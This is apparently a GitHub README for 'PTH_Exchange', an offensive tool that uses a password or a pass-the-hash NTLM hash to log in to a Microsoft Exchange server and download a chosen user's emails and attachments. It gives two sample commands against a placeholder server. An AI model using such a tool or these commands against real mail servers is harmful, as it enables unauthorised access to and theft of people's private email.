Skip to content

Jumbo-WJB/PTH_Exchange

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

PTH Exchange

If you only have hash, you can still operate exchange

This project module is the same as my other project Exchange_SSRF, This project uses the correct account password or NTLM HASH, Exchange_SSRF uses ProxyShell.

Download user's emails (include attachment) 下载指定用户的邮件,包括附件

run 运行程序(password):

python pthexchange.py  --target https://mail.exchange.com --username "yourusername" --password "yourpassword" --action Download

result 结果:

image-20211021191358667

run 运行程序(NTLM HASH):

python pthexchange.py  --target https://mail.exchange.com --username "yourusername" --password "00000000000000000000000000000000:11111111111111111111111111111111" --action Download

result 结果:

image-20211021191429211

About

If you only have hash, you can still operate exchange

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages